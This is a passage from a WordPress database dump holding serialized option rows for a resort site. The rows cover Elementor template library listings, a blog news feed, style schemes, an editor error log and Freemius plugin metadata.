Conference\";s:9:\"thumbnail\";s:63:\"https://library.elementor.com/wp-content/uploads/2017/12/q1.png\";s:12:\"tmpl_created\";s:10:\"1514206745\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/christmas-design-conference/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"137\";s:16:\"popularity_index\";s:3:\"128\";s:11:\"trend_index\";s:3:\"279\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:136;a:14:{s:2:\"id\";s:4:\"3777\";s:5:\"title\";s:39:\"Christmas &#8211; Snowboard Competition\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/12/cover-lib-v7.png\";s:12:\"tmpl_created\";s:10:\"1514205420\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/christmas-snowboard-competition/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"138\";s:16:\"popularity_index\";s:3:\"129\";s:11:\"trend_index\";s:3:\"319\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:137;a:14:{s:2:\"id\";s:3:\"420\";s:5:\"title\";s:11:\"Hero UI Kit\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2016/09/library-ui-kit-cover.png\";s:12:\"tmpl_created\";s:10:\"1475067229\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/hero-ui-kit/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"139\";s:16:\"popularity_index\";s:1:\"8\";s:11:\"trend_index\";s:2:\"16\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}}','no'),(18119,'elementor_remote_info_feed_data','a:5:{i:0;a:5:{s:5:\"title\";s:59:\"How To Build a Mega Menu With Elementor and the Plus Addons\";s:7:\"excerpt\";s:251:\"Do your site visitors need to hover over an awkward drop-down, in the hopes of picking the right option? Then you need a mega-menu. In this tutorial, we\'ll show you how to create your own custom WordPress mega menu using Elementor and The Plus Addons.\";s:7:\"created\";i:1603963969;s:5:\"badge\";s:0:\"\";s:3:\"url\";s:119:\"https://elementor.com/blog/wordpress-mega-menu/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:1;a:5:{s:5:\"title\";s:67:\"How To Choose The Right Brand Imagery For Your Business | Elementor\";s:7:\"excerpt\";s:148:\"Brand imagery plays a vital role in creating a positive and long-lasting association with your brand. Discover how to choose the right one for you. \";s:7:\"created\";i:1603895496;s:5:\"badge\";s:0:\"\";s:3:\"url\";s:113:\"https://elementor.com/blog/brand-imagery/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:2;a:5:{s:5:\"title\";s:30:\"Meet Our Leaders: Menny Benady\";s:7:\"excerpt\";s:265:\"A web professional and digital marketing expert, Menny Benady is an artist who dabbles with different methods and techniques — from sketching to oil and acrylic painting and sculpting. This month, we introduce you to the leader of the Israel Elementor Community! \";s:7:\"created\";i:1603787082;s:5:\"badge\";s:0:\"\";s:3:\"url\";s:129:\"https://elementor.com/blog/meet-our-leaders-menny-benady/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:3;a:5:{s:5:\"title\";s:47:\"Elementor Sites of the Month — September 2020\";s:7:\"excerpt\";s:325:\"Get ready to see some of the best magazine and blog websites built with Elementor. This month’s showcase explores the top ten magazine or blog websites from our user community, and shows prime examples for how to design your next blog or magazine site, with many unique options for layout, color schemes, motifs, and so on.\";s:7:\"created\";i:1602495962;s:5:\"badge\";s:0:\"\";s:3:\"url\";s:123:\"https://elementor.com/blog/showcase-september-2020/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:4;a:5:{s:5:\"title\";s:36:\"The Complete WordPress Sidebar Guide\";s:7:\"excerpt\";s:150:\"Learn how sidebars can improve your site navigation and help you convert more of your traffic with the aid of the right widgets and good use of space.\";s:7:\"created\";i:1602398496;s:5:\"badge\";s:0:\"\";s:3:\"url\";s:123:\"https://elementor.com/blog/wordpress-sidebar-guide/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}}','no'),(18122,'elementor_scheme_color','a:4:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";}','yes'),(18123,'elementor_scheme_typography','a:4:{i:1;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"600\";}i:2;a:2:{s:11:\"font_family\";s:11:\"Roboto Slab\";s:11:\"font_weight\";s:3:\"400\";}i:3;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"400\";}i:4;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"500\";}}','yes'),(18124,'elementor_scheme_color-picker','a:8:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";i:5;s:7:\"#4054b2\";i:6;s:7:\"#23a455\";i:7;s:4:\"#000\";i:8;s:4:\"#fff\";}','yes'),(18156,'_elementor_settings_update_time','1523927650','yes'),(18157,'elementor_cpt_support','a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}','yes'),(18158,'elementor_exclude_user_roles','a:0:{}','yes'),(18159,'elementor_disable_color_schemes','','yes'),(18160,'elementor_disable_typography_schemes','','yes'),(18161,'elementor_allow_tracking','no','yes'),(18162,'elementor_default_generic_fonts','Sans-serif','yes'),(18163,'elementor_container_width','','yes'),(18164,'elementor_space_between_widgets','','yes'),(18165,'elementor_stretched_section_container','','yes'),(18166,'elementor_page_title_selector','','yes'),(18167,'elementor_global_image_lightbox','yes','yes'),(18168,'elementor_css_print_method','external','yes'),(18169,'elementor_editor_break_lines','','yes'),(18178,'elementor_debug_log','a:10:{i:0;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1545070503\";s:7:\"message\";s:55:\"Object doesn\\\'t support property or method \\\'contains\\\'\";s:3:\"url\";s:85:\"http://ashbyresort.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=2.3.5\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"94891\";s:12:\"customFields\";a:0:{}}i:1;a:8:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1545070624\";s:7:\"message\";s:54:\"Object doesn\\\'t support property or method \\\'entries\\\'\";s:3:\"url\";s:85:\"http://ashbyresort.com/wp-content/plugins/elementor/assets/js/common.min.js?ver=2.3.5\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"11083\";s:12:\"customFields\";a:0:{}s:5:\"times\";i:2;}i:2;a:8:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1545070816\";s:7:\"message\";s:55:\"Object doesn\\\'t support property or method \\\'contains\\\'\";s:3:\"url\";s:85:\"http://ashbyresort.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=2.3.5\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"94891\";s:12:\"customFields\";a:0:{}s:5:\"times\";i:2;}i:3;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1545070819\";s:7:\"message\";s:54:\"Object doesn\\\'t support property or method \\\'entries\\\'\";s:3:\"url\";s:85:\"http://ashbyresort.com/wp-content/plugins/elementor/assets/js/common.min.js?ver=2.3.5\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"11083\";s:12:\"customFields\";a:0:{}}i:4;a:8:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1545070928\";s:7:\"message\";s:55:\"Object doesn\\\'t support property or method \\\'contains\\\'\";s:3:\"url\";s:85:\"http://ashbyresort.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=2.3.5\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"94891\";s:12:\"customFields\";a:0:{}s:5:\"times\";i:9;}i:5;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1545070931\";s:7:\"message\";s:54:\"Object doesn\\\'t support property or method \\\'entries\\\'\";s:3:\"url\";s:85:\"http://ashbyresort.com/wp-content/plugins/elementor/assets/js/common.min.js?ver=2.3.5\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"11083\";s:12:\"customFields\";a:0:{}}i:6;a:8:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1545072201\";s:7:\"message\";s:55:\"Object doesn\\\'t support property or method \\\'contains\\\'\";s:3:\"url\";s:85:\"http://ashbyresort.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=2.3.5\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"94891\";s:12:\"customFields\";a:0:{}s:5:\"times\";i:9;}i:7;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1545072204\";s:7:\"message\";s:54:\"Object doesn\\\'t support property or method \\\'entries\\\'\";s:3:\"url\";s:85:\"http://ashbyresort.com/wp-content/plugins/elementor/assets/js/common.min.js?ver=2.3.5\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"11083\";s:12:\"customFields\";a:0:{}}i:8;a:8:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1545072230\";s:7:\"message\";s:55:\"Object doesn\\\'t support property or method \\\'contains\\\'\";s:3:\"url\";s:85:\"http://ashbyresort.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=2.3.5\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"94891\";s:12:\"customFields\";a:0:{}s:5:\"times\";i:3;}i:9;a:8:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1545078902\";s:7:\"message\";s:54:\"Object doesn\\\'t support property or method \\\'entries\\\'\";s:3:\"url\";s:85:\"http://ashbyresort.com/wp-content/plugins/elementor/assets/js/common.min.js?ver=2.3.5\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"11083\";s:12:\"customFields\";a:0:{}s:5:\"times\";i:4;}}','no'),(18179,'fs_active_plugins','O:8:\"stdClass\":3:{s:7:\"plugins\";a:2:{s:28:\"press-elements/libs/freemius\";O:8:\"stdClass\":4:{s:7:\"version\";s:5:\"1.2.4\";s:4:\"type\";s:6:\"plugin\";s:9:\"timestamp\";i:1523928602;s:11:\"plugin_path\";s:33:\"press-elements/press-elements.php\";}s:50:\"addon-elements-for-elementor-page-builder/freemius\";O:8:\"stdClass\":4:{s:7:\"version\";s:5:\"2.3.0\";s:4:\"type\";s:6:\"plugin\";s:9:\"timestamp\";i:1580430947;s:11:\"plugin_path\";s:70:\"addon-elements-for-elementor-page-builder/elementor-addon-elements.php\";}}s:7:\"abspath\";s:42:\"/home/expcom5/public_html/ashbyresort.com/\";s:6:\"newest\";O:8:\"stdClass\":5:{s:11:\"plugin_path\";s:70:\"addon-elements-for-elementor-page-builder/elementor-addon-elements.php\";s:8:\"sdk_path\";s:50:\"addon-elements-for-elementor-page-builder/freemius\";s:7:\"version\";s:5:\"2.3.0\";s:13:\"in_activation\";b:0;s:9:\"timestamp\";i:1580430947;}}','yes'),(18180,'fs_debug_mode','','yes'),(18181,'fs_accounts','a:6:{s:21:\"id_slug_type_path_map\";a:2:{i:761;a:3:{s:4:\"slug\";s:14:\"press-elements\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:33:\"press-elements/press-elements.php\";}i:4599;a:3:{s:4:\"slug\";s:41:\"addon-elements-for-elementor-page-builder\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:70:\"addon-elements-for-elementor-page-builder/elementor-addon-elements.php\";}}s:11:\"plugin_data\";a:2:{s:14:\"press-elements\";a:18:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:33:\"press-elements/press-elements.php\";}s:17:\"install_timestamp\";i:1520648853;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";s:5:\"1.2.4\";s:11:\"sdk_version\";s:5:\"2.3.0\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";N;s:14:\"plugin_version\";s:5:\"1.7.2\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:15:\"ashbyresort.com\";s:9:\"server_ip\";s:13:\"47.203.137.20\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1520648853;s:7:\"version\";s:5:\"1.7.2\";}s:15:\"prev_is_premium\";b:0;s:16:\"uninstall_reason\";O:8:\"stdClass\":3:{s:2:\"id\";s:2:\"15\";s:4:\"info\";s:0:\"\";s:12:\"is_anonymous\";b:0;}s:12:\"is_anonymous\";a:3:{s:2:\"is\";b:1;s:9:\"timestamp\";i:1523928607;s:7:\"version\";s:5:\"1.7.2\";}s:20:\"is_network_activated\";b:0;s:24:\"handle_gdpr_admin_notice\";b:1;}s:41:\"addon-elements-for-elementor-page-builder\";a:16:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:70:\"addon-elements-for-elementor-page-builder/elementor-addon-elements.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1580430947;s:16:\"sdk_last_version\";N;s:11:\"sdk_version\";s:5:\"2.3.0\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:3:\"1.7\";s:14:\"plugin_version\";s:5:\"1.7.1\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:15:\"ashbyresort.com\";s:9:\"server_ip\";s:13:\"47.203.137.20\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1580430954;s:7:\"version\";s:5:\"1.6.1\";}s:15:\"prev_is_premium\";b:0;s:18:\"sticky_optin_added\";b:1;}}s:13:\"file_slug_map\";a:2:{s:33:\"press-elements/press-elements.php\";s:14:\"press-elements\";s:70:\"addon-elements-for-elementor-page-builder/elementor-addon-elements.php\";s:41:\"addon-elements-for-elementor-page-builder\";}s:7:\"plugins\";a:2:{s:14:\"press-elements\";O:9:\"FS_Plugin\":22:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:38:\"Press Elements - Widgets for Elementor\";s:4:\"slug\";s:14:\"press-elements\";s:12:\"premium_slug\";s:22:\"press-elements-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:33:\"press-elements/press-elements.php\";s:7:\"version\";s:5:\"1.7.2\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:10:\"public_key\";s:32:\"pk_fe2850d57f7d4f206aefaa106b91f\";s:10:\"secret_key\";N;s:2:\"id\";s:3:\"761\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:41:\"addon-elements-for-elementor-page-builder\";O:9:\"FS_Plugin\":22:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:24:\"Elementor Addon Elements\";s:4:\"slug\";s:41:\"addon-elements-for-elementor-page-builder\";s:12:\"premium_slug\";s:49:\"addon-elements-for-elementor-page-builder-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:70:\"addon-elements-for-elementor-page-builder/elementor-addon-elements.php\";s:7:\"version\";s:5:\"1.7.1\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:10:\"public_key\";s:32:\"pk_086ef046431438c9a172bb55fde28\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"4599\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:1;}}s:9:\"unique_id\";s:32:\"9a3e2fc48242e53111e2b23e10c20c74\";s:13:\"admin_notices\";a:2:{s:14:\"press-elements\";a:0:{}s:41:\"addon-elements-for-elementor-page-builder\";a:0:{}}}','yes'),(18182,'fs_api_cache','a:0:{}','yes'),(18248,'cff_rating_notice','pending','yes'),(18254,'cff_page_type','page','yes'),(19242,'elementor_version','3.0.12','yes'),(19247,'elementor_remote_info_library','a:3:{s:10:\"types_data\";a:2:{s:5:\"block\";a:1:{s:10:\"categories\";a:22:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:14:\"call to action\";i:4;s:7:\"clients\";i:5;s:7:\"contact\";i:6;s:3:\"faq\";i:7;s:8:\"features\";i:8;s:6:\"footer\";i:9;s:6:\"header\";i:10;s:4:\"hero\";i:11;s:9:\"portfolio\";i:12;s:7:\"pricing\";i:13;s:15:\"product archive\";i:14;s:8:\"services\";i:15;s:11:\"single page\";i:16;s:11:\"single post\";i:17;s:14:\"single product\";i:18;s:5:\"stats\";i:19;s:9:\"subscribe\";i:20;s:4:\"team\";i:21;s:12:\"testimonials\";}}s:5:\"popup\";a:1:{s:10:\"categories\";a:6:{i:0;s:10:\"bottom bar\";i:1;s:7:\"classic\";i:2;s:6:\"fly-in\";i:3;s:11:\"full screen\";i:4;s:9:\"hello bar\";i:5;s:8:\"slide-in\";}}}s:10:\"categories\";a:22:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:14:\"call to action\";i:4;s:7:\"clients\";i:5;s:7:\"contact\";i:6;s:3:\"faq\";i:7;s:8:\"features\";i:8;s:6:\"footer\";i:9;s:6:\"header\";i:10;s:4:\"hero\";i:11;s:9:\"portfolio\";i:12;s:7:\"pricing\";i:13;s:15:\"product archive\";i:14;s:8:\"services\";i:15;s:11:\"single page\";i:16;s:11:\"single post\";i:17;s:14:\"single product\";i:18;s:5:\"stats\";i:19;s:9:\"subscribe\";i:20;s:4:\"team\";i:21;s:12:\"testimonials\";}s:9:\"templates\";a:751:{i:0;a:14:{s:2:\"id\";i:5525;s:5:\"title\";s:8:\"About 14\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_10.png\";s:12:\"tmpl_created\";i:1520443532;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:9;s:11:\"trend_index\";i:6;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:1;a:14:{s:2:\"id\";i:10107;s:5:\"title\";s:34:\"Classic | Promotion | Announcement\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/balls_small.png\";s:12:\"tmpl_created\";i:1547851373;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/classic-promotion-announcement/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:240;s:11:\"trend_index\";i:197;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:2;a:14:{s:2:\"id\";i:14790;s:5:\"title\";s:33:\"Luxury Real Estate &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/07/Header.png\";s:12:\"tmpl_created\";i:1595315760;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/luxury-real-estate-header/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:37:\"[\"header\",\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:320;s:11:\"trend_index\";i:12;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:3;a:14:{s:2:\"id\";i:5533;s:5:\"title\";s:8:\"About 15\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_10.png\";s:12:\"tmpl_created\";i:1520443534;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-15/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:27;s:11:\"trend_index\";i:11;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:4;a:14:{s:2:\"id\";i:14799;s:5:\"title\";s:38:\"Luxury Real Estate &#8211; single post\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/07/Post.png\";s:12:\"tmpl_created\";i:1595315792;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/blocks/luxury-real-estate-single-post/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:28:\"[\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:586;s:11:\"trend_index\";i:129;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:5;a:14:{s:2:\"id\";i:5575;s:5:\"title\";s:5:\"CTA 7\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_3.png\";s:12:\"tmpl_created\";i:1520443543;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/cta-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:14;s:11:\"trend_index\";i:13;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:6;a:14:{s:2:\"id\";i:14809;s:5:\"title\";s:45:\"Luxury Real Estate &#8211; Properties Archive\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/07/Properties.png\";s:12:\"tmpl_created\";i:1595315826;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/blocks/luxury-real-estate-properties-archive/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:28:\"[\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:598;s:11:\"trend_index\";i:195;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:7;a:14:{s:2:\"id\";i:5615;s:5:\"title\";s:10:\"Features 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_5.png\";s:12:\"tmpl_created\";i:1520443551;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:33;s:11:\"trend_index\";i:64;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:8;a:14:{s:2:\"id\";i:14816;s:5:\"title\";s:47:\"Luxury Real Estate &#8211; Property single post\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2020/07/Single-Property-.png\";s:12:\"tmpl_created\";i:1595315847;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/blocks/luxury-real-estate-property-single-post/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:28:\"[\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:646;s:11:\"trend_index\";i:278;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:9;a:14:{s:2:\"id\";i:5624;s:5:\"title\";s:10:\"Features 5\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_1.png\";s:12:\"tmpl_created\";i:1520443553;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:77;s:11:\"trend_index\";i:157;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:10;a:14:{s:2:\"id\";i:14827;s:5:\"title\";s:39:\"Slide-In | Contact | Luxury Real Estate\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/07/PopUp.png\";s:12:\"tmpl_created\";i:1595323523;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/slide-in-contact-luxury-real-estate/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:28:\"[\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:672;s:11:\"trend_index\";i:425;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:11;a:14:{s:2:\"id\";i:5684;s:5:\"title\";s:5:\"FAQ 8\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_white_1.png\";s:12:\"tmpl_created\";i:1520443565;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:67;s:11:\"trend_index\";i:75;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:12;a:14:{s:2:\"id\";i:10158;s:5:\"title\";s:17:\"Classic | Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/coco_small.png\";s:12:\"tmpl_created\";i:1547852227;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/popups/classic-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:268;s:11:\"trend_index\";i:238;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:13;a:14:{s:2:\"id\";i:15052;s:5:\"title\";s:36:\"Flooring Company &#8211; Single post\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/08/Single.png\";s:12:\"tmpl_created\";i:1597738858;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/flooring-company-single-post/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:688;s:11:\"trend_index\";i:175;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:14;a:14:{s:2:\"id\";i:5693;s:5:\"title\";s:5:\"FAQ 